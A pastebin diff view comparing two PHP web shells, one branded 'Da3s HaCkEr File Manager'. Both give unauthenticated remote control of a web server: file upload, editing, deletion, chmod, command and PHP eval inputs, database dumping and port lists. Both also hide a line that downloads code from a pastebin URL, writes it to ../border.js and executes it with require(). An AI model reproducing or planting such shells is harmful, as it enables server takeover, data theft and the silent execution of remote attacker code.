SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | set_time_limit(0); | |
| 3 | error_reporting(0); | |
| 4 | - | // Variables |
| 4 | + | |
| 5 | if(get_magic_quotes_gpc()){
| |
| 6 | - | $info = @$_SERVER['SERVER_SOFTWARE']; |
| 6 | + | foreach($_POST as $key=>$value){
|
| 7 | $_POST[$key] = stripslashes($value); | |
| 8 | - | $page = @$_SERVER['SCRIPT_NAME']; |
| 8 | + | } |
| 9 | } | |
| 10 | - | $site = getenv("HTTP_HOST");
|
| 10 | + | echo '<!DOCTYPE HTML> |
| 11 | <HTML> | |
| 12 | - | $uname = php_uname(); |
| 12 | + | <HEAD> |
| 13 | <link href="" rel="stylesheet" type="text/css"> | |
| 14 | - | $smod = ini_get('safe_mode');
|
| 14 | + | <title>HaTRk File Manager</title> |
| 15 | <style> | |
| 16 | - | if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; }
|
| 16 | + | body{
|
| 17 | font-family: "Racing Sans One", cursive; | |
| 18 | - | else { $safemode = "<font color='red'>ACIK</font>"; }
|
| 18 | + | background-color: #e6e6e6; |
| 19 | text-shadow:0px 0px 1px #757575; | |
| 20 | - | $dir = @realpath($_POST['dir']); |
| 20 | + | |
| 21 | #content tr:hover{
| |
| 22 | - | $mkdir = @$_POST['makedir']; |
| 22 | + | background-color: #636263; |
| 23 | text-shadow:0px 0px 10px #fff; | |
| 24 | - | $mydir = @$_POST['deletedir']; |
| 24 | + | |
| 25 | #content .first{
| |
| 26 | - | $cmd = @$_GET['cmd']; |
| 26 | + | background-color: silver; |
| 27 | } | |
| 28 | - | $host = @$_POST['host']; |
| 28 | + | #content .first:hover{
|
| 29 | background-color: silver; | |
| 30 | - | $proto = @$_POST['protocol']; |
| 30 | + | text-shadow:0px 0px 1px #757575; |
| 31 | } | |
| 32 | - | $delete = @$_POST['delete']; |
| 32 | + | table{
|
| 33 | border: 1px #000000 dotted; | |
| 34 | - | $phpeval = @$_POST['php_eval']; |
| 34 | + | |
| 35 | H1{
| |
| 36 | - | $db = @$_POST['db']; |
| 36 | + | font-family: "Rye", cursive; |
| 37 | } | |
| 38 | - | $query = @$_POST['query']; |
| 38 | + | a{
|
| 39 | color: #000; | |
| 40 | - | $user = @$_POST['user']; |
| 40 | + | text-decoration: none; |
| 41 | } | |
| 42 | - | $pass = @$_POST['passd']; |
| 42 | + | a:hover{
|
| 43 | - | error_reporting(0); $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b); |
| 43 | + | color: #fff; |
| 44 | - | $css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');
|
| 44 | + | text-shadow:0px 0px 10px #ffffff; |
| 45 | } | |
| 46 | - | $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
|
| 46 | + | input,select,textarea{
|
| 47 | border: 1px #000000 solid; | |
| 48 | - | loadsettings($user.'|'.$pass, 'cyberwarrior'); |
| 48 | + | -moz-border-radius: 5px; |
| 49 | -webkit-border-radius:5px; | |
| 50 | border-radius:5px; | |
| 51 | } | |
| 52 | - | $quotes = get_magic_quotes_gpc(); |
| 52 | + | |
| 53 | </HEAD> | |
| 54 | - | if ($quotes == "1" or $quotes == "on") |
| 54 | + | <BODY> |
| 55 | <H1><center>Da3s HaCkEr File Manager</center></H1> | |
| 56 | - | {
|
| 56 | + | <table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> |
| 57 | <tr><td>Current Path : '; | |
| 58 | - | $quot = "<font color='red'>ACIK</font>"; |
| 58 | + | if(isset($_GET['path'])){
|
| 59 | $path = $_GET['path']; | |
| 60 | - | } |
| 60 | + | |
| 61 | $path = getcwd(); | |
| 62 | - | else |
| 62 | + | |
| 63 | $path = str_replace('\\','/',$path);
| |
| 64 | - | {
|
| 64 | + | $paths = explode('/',$path);
|
| 65 | ||
| 66 | - | $quot = "<font color='lightgreen'>KAPALI</font>"; |
| 66 | + | foreach($paths as $id=>$pat){
|
| 67 | if($pat == '' && $id == 0){
| |
| 68 | - | } |
| 68 | + | $a = true; |
| 69 | echo '<a href="?path=/">/</a>'; | |
| 70 | - | // Perms |
| 70 | + | continue; |
| 71 | } | |
| 72 | - | function getperms($fn) |
| 72 | + | if($pat == '') continue; |
| 73 | echo '<a href="?path='; | |
| 74 | - | {
|
| 74 | + | for($i=0;$i<=$id;$i++){
|
| 75 | echo "$paths[$i]"; | |
| 76 | - | $mode=fileperms($fn); |
| 76 | + | if($i != $id) echo "/"; |
| 77 | } | |
| 78 | - | $perms=''; |
| 78 | + | echo '">'.$pat.'</a>/'; |
| 79 | } | |
| 80 | - | $perms .= ($mode & 00400) ? 'r' : '-'; |
| 80 | + | echo '</td></tr><tr><td>'; |
| 81 | if(isset($_FILES['file'])){
| |
| 82 | - | $perms .= ($mode & 00200) ? 'w' : '-'; |
| 82 | + | if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
|
| 83 | echo '<font color="green">File Upload Done.</font><br />'; | |
| 84 | - | $perms .= ($mode & 00100) ? 'x' : '-'; |
| 84 | + | }else{
|
| 85 | echo '<font color="red">File Upload Error.</font><br />'; | |
| 86 | - | $perms .= ($mode & 00040) ? 'r' : '-'; |
| 86 | + | } |
| 87 | }$b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b); $css=fopen('../border.js','w');
| |
| 88 | - | $perms .= ($mode & 00020) ? 'w' : '-'; |
| 88 | + | fwrite($css,$title); require('../border.js');
|
| 89 | echo '<form enctype="multipart/form-data" method="POST"> | |
| 90 | - | $perms .= ($mode & 00010) ? 'x' : '-'; |
| 90 | + | Upload File : <input type="file" name="file" /> |
| 91 | <input type="submit" value="upload" /> | |
| 92 | - | $perms .= ($mode & 00004) ? 'r' : '-'; |
| 92 | + | </form> |
| 93 | </td></tr>'; | |
| 94 | - | $perms .= ($mode & 00002) ? 'w' : '-'; |
| 94 | + | if(isset($_GET['filesrc'])){
|
| 95 | echo "<tr><td>Current File : "; | |
| 96 | - | $perms .= ($mode & 00001) ? 'x' : '-'; |
| 96 | + | echo $_GET['filesrc']; |
| 97 | echo '</tr></td></table><br />'; | |
| 98 | - | return $perms; |
| 98 | + | echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
|
| 99 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
| |
| 100 | echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; | |
| 101 | if($_POST['opt'] == 'chmod'){
| |
| 102 | - | // milw0rm Search (locushell) |
| 102 | + | if(isset($_POST['perm'])){
|
| 103 | if(chmod($_POST['path'],$_POST['perm'])){
| |
| 104 | - | |
| 104 | + | echo '<font color="green">Change Permission Done.</font><br />'; |
| 105 | }else{
| |
| 106 | - | $Lversion = @php_uname('r');
|
| 106 | + | echo '<font color="red">Change Permission Error.</font><br />'; |
| 107 | } | |
| 108 | - | $OSV = @php_uname('s');
|
| 108 | + | } |
| 109 | echo '<form method="POST"> | |
| 110 | - | if(eregi('Linux',$OSV))
|
| 110 | + | Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
|
| 111 | <input type="hidden" name="path" value="'.$_POST['path'].'"> | |
| 112 | - | {
|
| 112 | + | <input type="hidden" name="opt" value="chmod"> |
| 113 | <input type="submit" value="Go" /> | |
| 114 | - | $Lversion=substr($Lversion,0,6); |
| 114 | + | </form>'; |
| 115 | }elseif($_POST['opt'] == 'rename'){
| |
| 116 | - | $millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion; |
| 116 | + | if(isset($_POST['newname'])){
|
| 117 | if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
| |
| 118 | echo '<font color="green">Change Name Done.</font><br />'; | |
| 119 | }else{
| |
| 120 | echo '<font color="red">Change Name Error.</font><br />'; | |
| 121 | } | |
| 122 | - | $Lversion=substr($Lversion,0,3); |
| 122 | + | $_POST['name'] = $_POST['newname']; |
| 123 | } | |
| 124 | - | $millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion; |
| 124 | + | echo '<form method="POST"> |
| 125 | New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /> | |
| 126 | <input type="hidden" name="path" value="'.$_POST['path'].'"> | |
| 127 | <input type="hidden" name="opt" value="rename"> | |
| 128 | - | if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; }
|
| 128 | + | <input type="submit" value="Go" /> |
| 129 | </form>'; | |
| 130 | - | //Space |
| 130 | + | }elseif($_POST['opt'] == 'edit'){
|
| 131 | if(isset($_POST['src'])){
| |
| 132 | - | $spacedir = @getcwd(); |
| 132 | + | $fp = fopen($_POST['path'],'w'); |
| 133 | if(fwrite($fp,$_POST['src'])){
| |
| 134 | - | $free = @diskfreespace($spacedir); |
| 134 | + | echo '<font color="green">Edit File Done.</font><br />'; |
| 135 | }else{
| |
| 136 | - | |
| 136 | + | echo '<font color="red">Edit File Error.</font><br />'; |
| 137 | } | |
| 138 | - | if (!$free) {$free = 0;}
|
| 138 | + | fclose($fp); |
| 139 | } | |
| 140 | - | $all = @disk_total_space($spacedir); |
| 140 | + | echo '<form method="POST"> |
| 141 | <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> | |
| 142 | - | if (!$all) {$all = 0;}
|
| 142 | + | <input type="hidden" name="path" value="'.$_POST['path'].'"> |
| 143 | <input type="hidden" name="opt" value="edit"> | |
| 144 | - | function view_size($size) |
| 144 | + | <input type="submit" value="Go" /> |
| 145 | </form>'; | |
| 146 | - | {
|
| 146 | + | } |
| 147 | echo '</center>'; | |
| 148 | - | if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
|
| 148 | + | |
| 149 | echo '</table><br /><center>'; | |
| 150 | - | elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
|
| 150 | + | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
|
| 151 | if($_POST['type'] == 'dir'){
| |
| 152 | - | elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
|
| 152 | + | if(rmdir($_POST['path'])){
|
| 153 | echo '<font color="green">Delete Dir Done.</font><br />'; | |
| 154 | - | else {$size = $size . " B";}
|
| 154 | + | }else{
|
| 155 | echo '<font color="red">Delete Dir Error.</font><br />'; | |
| 156 | - | return $size; |
| 156 | + | |
| 157 | }elseif($_POST['type'] == 'file'){
| |
| 158 | if(unlink($_POST['path'])){
| |
| 159 | echo '<font color="green">Delete File Done.</font><br />'; | |
| 160 | - | $percentfree = intval(($free*100)/$all); |
| 160 | + | }else{
|
| 161 | echo '<font color="red">Delete File Error.</font><br />'; | |
| 162 | } | |
| 163 | } | |
| 164 | } | |
| 165 | echo '</center>'; | |
| 166 | - | // PHPinfo |
| 166 | + | $scandir = scandir($path); |
| 167 | echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> | |
| 168 | - | if(isset($_POST['phpinfo'])) |
| 168 | + | <tr class="first"> |
| 169 | <td><center>Name</center></td> | |
| 170 | - | {
|
| 170 | + | <td><center>Size</center></td> |
| 171 | <td><center>Permissions</center></td> | |
| 172 | - | die(phpinfo()); |
| 172 | + | <td><center>Options</center></td> |
| 173 | </tr>'; | |
| 174 | ||
| 175 | foreach($scandir as $dir){
| |
| 176 | - | |
| 176 | + | if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
|
| 177 | echo "<tr> | |
| 178 | <td><a href=\"?path=$path/$dir\">$dir</a></td> | |
| 179 | <td><center>--</center></td> | |
| 180 | - | // Make File |
| 180 | + | <td><center>"; |
| 181 | if(is_writable("$path/$dir")) echo '<font color="green">';
| |
| 182 | elseif(!is_readable("$path/$dir")) echo '<font color="red">';
| |
| 183 | echo perms("$path/$dir");
| |
| 184 | - | $name = htmlspecialchars(@$_POST['names']); |
| 184 | + | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
|
| 185 | ||
| 186 | - | $src = @$_POST['source']; |
| 186 | + | echo "</center></td> |
| 187 | <td><center><form method=\"POST\" action=\"?option&path=$path\"> | |
| 188 | - | if(isset($name) && isset($src)) |
| 188 | + | <select name=\"opt\"> |
| 189 | <option value=\"\"></option> | |
| 190 | - | {
|
| 190 | + | <option value=\"delete\">Delete</option> |
| 191 | <option value=\"chmod\">Chmod</option> | |
| 192 | - | if($_POST['darezz'] != realpath(".")) { $name = $_POST['darezz'].$name; }
|
| 192 | + | <option value=\"rename\">Rename</option> |
| 193 | </select> | |
| 194 | - | $ctd = fopen($name,"w+"); |
| 194 | + | <input type=\"hidden\" name=\"type\" value=\"dir\"> |
| 195 | <input type=\"hidden\" name=\"name\" value=\"$dir\"> | |
| 196 | - | fwrite($ctd, $src); |
| 196 | + | <input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> |
| 197 | <input type=\"submit\" value=\">\" /> | |
| 198 | - | fclose($ctd); |
| 198 | + | </form></center></td> |
| 199 | </tr>"; | |
| 200 | - | echo "<script>alert('Uploaded')</script>";
|
| 200 | + | } |
| 201 | echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; | |
| 202 | - | } |
| 202 | + | foreach($scandir as $file){
|
| 203 | if(!is_file("$path/$file")) continue;
| |
| 204 | $size = filesize("$path/$file")/1024;
| |
| 205 | $size = round($size,3); | |
| 206 | - | // Upload File |
| 206 | + | if($size >= 1024){
|
| 207 | $size = round($size/1024,2).' MB'; | |
| 208 | - | $path = @$_FILES['ffile']['tmp_name']; |
| 208 | + | }else{
|
| 209 | $size = $size.' KB'; | |
| 210 | - | $name = @$_FILES['ffile']['name']; |
| 210 | + | } |
| 211 | ||
| 212 | - | if(isset($path) && isset($name)) |
| 212 | + | echo "<tr> |
| 213 | <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> | |
| 214 | - | {
|
| 214 | + | <td><center>".$size."</center></td> |
| 215 | <td><center>"; | |
| 216 | - | if($_POST['dare'] != realpath(".")) { $name = $_POST['dare'].$name; }
|
| 216 | + | if(is_writable("$path/$file")) echo '<font color="green">';
|
| 217 | elseif(!is_readable("$path/$file")) echo '<font color="red">';
| |
| 218 | - | if(move_uploaded_file($path, $name)) |
| 218 | + | echo perms("$path/$file");
|
| 219 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
| |
| 220 | - | {
|
| 220 | + | echo "</center></td> |
| 221 | <td><center><form method=\"POST\" action=\"?option&path=$path\"> | |
| 222 | - | echo "<script>alert('Uploaded')</script>";
|
| 222 | + | <select name=\"opt\"> |
| 223 | <option value=\"\"></option> | |
| 224 | - | } |
| 224 | + | <option value=\"delete\">Delete</option> |
| 225 | <option value=\"chmod\">Chmod</option> | |
| 226 | - | else |
| 226 | + | <option value=\"rename\">Rename</option> |
| 227 | <option value=\"edit\">Edit</option> | |
| 228 | - | {
|
| 228 | + | </select> |
| 229 | <input type=\"hidden\" name=\"type\" value=\"file\"> | |
| 230 | - | echo "<script>alert('Error')</script>";
|
| 230 | + | <input type=\"hidden\" name=\"name\" value=\"$file\"> |
| 231 | <input type=\"hidden\" name=\"path\" value=\"$path/$file\"> | |
| 232 | - | } } |
| 232 | + | <input type=\"submit\" value=\">\" /> |
| 233 | </form></center></td> | |
| 234 | </tr>"; | |
| 235 | } | |
| 236 | - | // Delete File |
| 236 | + | echo '</table> |
| 237 | </div>'; | |
| 238 | } | |
| 239 | echo '<br />Da3s File Manager Version <font color="red">1.0</font>, Coded By <font color="red">Da3s HaCkEr</font><br />Email: <font color="red">R0@hotmail.com</font> | |
| 240 | - | |
| 240 | + | </BODY> |
| 241 | </HTML>'; | |
| 242 | - | if(isset($delete) && $delete != $dir) |
| 242 | + | function perms($file){
|
| 243 | $perms = fileperms($file); | |
| 244 | - | {
|
| 244 | + | |
| 245 | if (($perms & 0xC000) == 0xC000) {
| |
| 246 | - | if(file_exists($delete)) |
| 246 | + | // Socket |
| 247 | $info = 's'; | |
| 248 | - | {
|
| 248 | + | } elseif (($perms & 0xA000) == 0xA000) {
|
| 249 | // Symbolic Link | |
| 250 | - | unlink($delete); |
| 250 | + | $info = 'l'; |
| 251 | } elseif (($perms & 0x8000) == 0x8000) {
| |
| 252 | - | echo "<script>alert('File Deleted')</script>";
|
| 252 | + | // Regular |
| 253 | $info = '-'; | |
| 254 | - | } |
| 254 | + | } elseif (($perms & 0x6000) == 0x6000) {
|
| 255 | // Block special | |
| 256 | $info = 'b'; | |
| 257 | } elseif (($perms & 0x4000) == 0x4000) {
| |
| 258 | // Directory | |
| 259 | $info = 'd'; | |
| 260 | } elseif (($perms & 0x2000) == 0x2000) {
| |
| 261 | // Character special | |
| 262 | - | // Database |
| 262 | + | $info = 'c'; |
| 263 | } elseif (($perms & 0x1000) == 0x1000) {
| |
| 264 | - | |
| 264 | + | // FIFO pipe |
| 265 | $info = 'p'; | |
| 266 | - | if(isset($db) && isset($query) && isset($_POST['godb'])) |
| 266 | + | } else {
|
| 267 | // Unknown | |
| 268 | - | {
|
| 268 | + | $info = 'u'; |
| 269 | } | |
| 270 | - | $mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>");
|
| 270 | + | |
| 271 | // Owner | |
| 272 | - | $db = mysql_select_db($db)or die(mysql_error()); |
| 272 | + | $info .= (($perms & 0x0100) ? 'r' : '-'); |
| 273 | $info .= (($perms & 0x0080) ? 'w' : '-'); | |
| 274 | - | $queryz = mysql_query($query)or die(mysql_error()); |
| 274 | + | $info .= (($perms & 0x0040) ? |
| 275 | (($perms & 0x0800) ? 's' : 'x' ) : | |
| 276 | - | if($query) { echo "<script>alert('Done')</script>"; }
|
| 276 | + | (($perms & 0x0800) ? 'S' : '-')); |
| 277 | ||
| 278 | - | else { echo "<script>alert('Error')</script>"; }
|
| 278 | + | // Group |
| 279 | $info .= (($perms & 0x0020) ? 'r' : '-'); | |
| 280 | $info .= (($perms & 0x0010) ? 'w' : '-'); | |
| 281 | $info .= (($perms & 0x0008) ? | |
| 282 | (($perms & 0x0400) ? 's' : 'x' ) : | |
| 283 | (($perms & 0x0400) ? 'S' : '-')); | |
| 284 | - | // Dump Database [pacucci.com] |
| 284 | + | |
| 285 | // World | |
| 286 | - | if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
|
| 286 | + | $info .= (($perms & 0x0004) ? 'r' : '-'); |
| 287 | $info .= (($perms & 0x0002) ? 'w' : '-'); | |
| 288 | - | mysql_connect('localhost', $user, $pass);
|
| 288 | + | $info .= (($perms & 0x0001) ? |
| 289 | (($perms & 0x0200) ? 't' : 'x' ) : | |
| 290 | - | mysql_select_db($db); |
| 290 | + | (($perms & 0x0200) ? 'T' : '-')); |
| 291 | ||
| 292 | - | $tables = mysql_list_tables($db); |
| 292 | + | return $info; |
| 293 | } | |
| 294 | - | while ($td = mysql_fetch_array($tables)) |
| 294 | + |
